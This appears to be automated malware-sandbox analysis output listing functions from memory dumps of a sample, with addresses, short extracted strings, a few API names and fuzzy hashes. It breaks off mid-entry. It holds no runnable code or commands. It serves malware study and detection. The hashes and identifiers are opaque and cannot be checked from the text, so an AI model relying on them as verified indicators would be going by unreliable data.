Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757

Function 00415298 Relevance: 6.1, Strings: 4, Instructions: 1123COMMON

Download Yara Rule

Strings

in~x, xrefs: 00415AFB
kmbj, xrefs: 00415B8C
ydij, xrefs: 00415B93
Z\, xrefs: 00415344

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: in~x$kmbj$ydij$Z\
API String ID: 0-979945983
Opcode ID: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
Opcode Fuzzy Hash: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55

Function 0092E1E7 Relevance: 5.9, Strings: 4, Instructions: 864COMMON

Download Yara Rule

Strings

)R_X, xrefs: 0092E3D7
[O_[, xrefs: 0092E50F
zusR, xrefs: 0092E3B5
&-, xrefs: 0092E601

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: &-$)R_X$[O_[$zusR
API String ID: 0-3432275560
Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
Instruction ID: d0cb82bd53bedfb3baf177d0c048dd6eb3c9ae4b9c90cc6f225b4a31698332bf
Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
Instruction Fuzzy Hash: D5424A7050C3A08FC725DF28D89076EBBE1AF96314F084A6DE8E55B392D736C905D792

Function 0041DF80 Relevance: 5.9, Strings: 4, Instructions: 864COMMON

Download Yara Rule

Strings

zusR, xrefs: 0041E14E
)R_X, xrefs: 0041E170
[O_[, xrefs: 0041E2A8
&-, xrefs: 0041E39A

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: &-$)R_X$[O_[$zusR
API String ID: 0-3432275560
Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A

Function 0093B75E Relevance: 5.5, Strings: 4, Instructions: 523COMMON

Download Yara Rule

Strings

/26-, xrefs: 0093B99C
%(#}, xrefs: 0093B9A7
1, xrefs: 0093BDC0
/, xrefs: 0093BB6F

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: %(#}$/$/26-$1
API String ID: 0-261129489
Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
Instruction ID: ceabcbb42f4078a45fa879fec8c58fcb35e0cf1b193a5640d980d922e3019b18
Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
Instruction Fuzzy Hash: 70E1F47111D3C18BE775CF29C451BBABBD6EF92304F18896DD1D98B292DB39840ACB12

Function 0042B4F7 Relevance: 5.5, Strings: 4, Instructions: 523COMMON

Download Yara Rule

Strings

/26-, xrefs: 0042B735
/, xrefs: 0042B908
1, xrefs: 0042BB59
%(#}, xrefs: 0042B740

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: %(#}$/$/26-$1
API String ID: 0-261129489
Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796

Function 0093B763 Relevance: 5.5, Strings: 4, Instructions: 519COMMON

Download Yara Rule

Strings

/26-, xrefs: 0093B99C
%(#}, xrefs: 0093B9A7
1, xrefs: 0093BDC0
/, xrefs: 0093BB6F

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: %(#}$/$/26-$1
API String ID: 0-261129489
Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
Instruction ID: ca3ac6645e8b7d97c13dbe3153a2ac13acab003bb037e7bf26632f37210c3c99
Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
Instruction Fuzzy Hash: F2E1C67151D3C18AE775CF29C4607BBBBD6AFD2304F1888ADD1D98B292DB39450ACB12

Function 0042B4FC Relevance: 5.5, Strings: 4, Instructions: 519COMMON

Download Yara Rule

Strings

/26-, xrefs: 0042B735
/, xrefs: 0042B908
1, xrefs: 0042BB59
%(#}, xrefs: 0042B740

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: %(#}$/$/26-$1
API String ID: 0-261129489
Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56

Function 00418578 Relevance: 5.5, Strings: 4, Instructions: 455COMMON

Download Yara Rule

Strings

?TUV, xrefs: 00418704
"w+y, xrefs: 004185AB
^QRW, xrefs: 00418B45
D@YO, xrefs: 00418B3E

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: "w+y$?TUV$D@YO$^QRW
API String ID: 0-2418547040
Opcode ID: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
Opcode Fuzzy Hash: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44

Function 00431839 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00431887
GetSystemMetrics.USER32 ref: 00431896

Strings

, xrefs: 0043196A

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96

Function 0091D25A Relevance: 5.3, Strings: 4, Instructions: 291COMMON

Download Yara Rule

Strings

pr, xrefs: 0091D558
3ej, xrefs: 0091D544
BI, xrefs: 0091D4BA
ZG, xrefs: 0091D4C1

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: BI$ZG$3ej$pr
API String ID: 0-483502859
Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction ID: 76325ab432593c11a589df194e87a839620b77fc827494aaf18bd31a794f55a3
Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction Fuzzy Hash: 29A1B3B52017818FD729CF29C590A62BBF2FF96304B1995ADC0D68F7A6D734E842CB50

Function 0040CFF3 Relevance: 5.3, Strings: 4, Instructions: 291COMMON

Download Yara Rule

Strings

3ej, xrefs: 0040D2DD
ZG, xrefs: 0040D25A
BI, xrefs: 0040D253
pr, xrefs: 0040D2F1

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: BI$ZG$3ej$pr
API String ID: 0-483502859
Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54

Function 00426054 Relevance: 4.2, Strings: 3, Instructions: 483COMMON

Download Yara Rule

Strings

V3R5, xrefs: 00426774
dB, xrefs: 004264D2
67, xrefs: 0042677F

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: 67$V3R5$dB
API String ID: 0-2543814982
Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A

Function 009287DF Relevance: 4.0, Strings: 3, Instructions: 234COMMON

Download Yara Rule

Strings

"w+y, xrefs: 00928812
DX8Z, xrefs: 00928956
?TUV, xrefs: 0092896B

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: "w+y$?TUV$DX8Z
API String ID: 0-3307990326
Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
Instruction ID: 09b59d65e27155c4f02b4643068355ea6adf398a2bb0d63e992f199afa2185a0
Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
Instruction Fuzzy Hash: E081DD756017228FC728CF29C890A67B7F2FF99710B19859DC8824FB69EB34E841CB45

Function 009299D7 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON

Download Yara Rule

Strings

I,~M, xrefs: 0092A6AF
,)*k, xrefs: 0092A0BB

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: ,)*k$I,~M
API String ID: 0-936430989
Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
Instruction ID: ad327b0a7332552cd5b83ac4303a62f83da5c975bb25098d40d8108900ad7670
Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
Instruction Fuzzy Hash: 4D8222756083509FD7648F24A880B2FBBE6EBD6714F28892CE0C587296D772DC42CB46

Function 00419770 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON

Download Yara Rule

Strings

,)*k, xrefs: 00419E54
I,~M, xrefs: 0041A448

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ,)*k$I,~M
API String ID: 2994545307-936430989
Opcode ID: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
Opcode Fuzzy Hash: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A

Function 0091DF8C Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

CoUninitialize.COMBASE ref: 0091DF9C

Strings

PT, xrefs: 0091E1CA

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: PT
API String ID: 3861434553-4135314810
Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction ID: aae6031dc56df7b90f48744d4db539eb86089da817fd2335aa00ed17550cbc59
Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction Fuzzy Hash: 61A1BFB46087818FD7268F29C4A0A62BFE1EF57300B19869CC8E24FB66D339D845CB15

Function 0040DD25 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0040DD35

Strings

PT, xrefs: 0040DF63

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: PT
API String ID: 3861434553-4135314810
Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55

Function 0091ABA7 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

BE, xrefs: 0091ADC4
de, xrefs: 0091AD5A

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: BE$de
API String ID: 0-1272349043
Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction ID: bf731c40be7d0f27d0455a79cbd573c977d11bded3b2f9e062740e45651a4dae
Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction Fuzzy Hash: 24D1177164C3688BD728DF2888516AFFBE7ABC6304F18492CE8D19B395D674CD46C782

Function 0040A940 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

BE, xrefs: 0040AB5D
de, xrefs: 0040AAF3

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: BE$de
API String ID: 0-1272349043
Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787

Function 0094CD87 Relevance: 2.6, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

@, xrefs: 0094CE5C
ihgf, xrefs: 0094CE7A

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: @$ihgf
API String ID: 0-73152791
Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
Instruction ID: d85e96656787c87c2e0ba61a5a27f1bc630be0e43e1353331d9ffdab156b79f8
Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
Instruction Fuzzy Hash: 144122B1A052019FD754CF24C852B7BB7A6FFD2318F14862CE4959B391E7359C05CB82

Function 0043CB20 Relevance: 2.6, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0043CC13
@, xrefs: 0043CBF5

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: @$ihgf
API String ID: 2994545307-73152791
Opcode ID: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
Opcode Fuzzy Hash: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A

Function 0092554C Relevance: 2.6, Strings: 2, Instructions: 113COMMON

Download Yara Rule

Strings

^P, xrefs: 009255B2
Z\, xrefs: 009255AB

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: Z\$^P
API String ID: 0-3724859648
Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
Instruction ID: 89885b30e333c1d148012c88faa67b510dbb0808da16a7c6c4582fe58c1a2550
Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
Instruction Fuzzy Hash: 4841C2B1A11A00CFC718CF24C892A62B7B2FF99324B16855CD4968F765E738E841CB55

Function 0042750D Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

`rB, xrefs: 00427341
AzB, xrefs: 004275AA

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: AzB$`rB
API String ID: 0-365317308
Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A

Function 00427326 Relevance: 2.5, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

`rB, xrefs: 00427341
AzB, xrefs: 004275AA

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: AzB$`rB
API String ID: 0-365317308
Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A

Function 00417582 Relevance: 2.2, Strings: 1, Instructions: 985COMMON

Download Yara Rule

Strings

c$, xrefs: 00417707

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: c$
API String ID: 0-2516980088
Opcode ID: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
Opcode Fuzzy Hash: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58

Function 00415F66 Relevance: 1.9, Strings: 1, Instructions: 605COMMON

Download Yara Rule

Strings

A67H, xrefs: 004164FD

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: A67H
API String ID: 0-3389657328
Opcode ID: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
Opcode Fuzzy Hash: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58

Function 00928F35 Relevance: 1.8, Strings: 1, Instructions: 598COMMON

Download Yara Rule

Strings

[, xrefs: 0092942B

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: [
API String ID: 0-3878419350
Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
Instruction ID: c68e0b605705a512a500e8434d86e9691ec10461544179c99e35c96f36a98004
Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
Instruction Fuzzy Hash: 9F022275600712CBCB34CF29C8D1662B7F2FF95314B19859CC4864BBA9EB39E852CB50

Function 00946E67 Relevance: 1.7, Strings: 1, Instructions: 453COMMON

Download Yara Rule

Strings

,)*k, xrefs: 00946F8C

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: ,)*k
API String ID: 0-1228391949
Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
Instruction ID: 5f5fd4a9191fbe6d4fd8f416d9bbd5ee437124ea229dcaa1817ee7f93ebeaefa
Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
Instruction Fuzzy Hash: FFC133B5A0C3545BD324DFA0C890E2FBBEAABE6714F188A2CE5C563691D7719C04C792

Function 00436C00 Relevance: 1.7, Strings: 1, Instructions: 453COMMON

Download Yara Rule

Strings

,)*k, xrefs: 00436D25

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ,)*k
API String ID: 2994545307-1228391949
Opcode ID: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
Opcode Fuzzy Hash: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A

Function 00427DA2 Relevance: 1.7, Strings: 1, Instructions: 447COMMON

Download Yara Rule

Strings

m, xrefs: 00427DE0

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
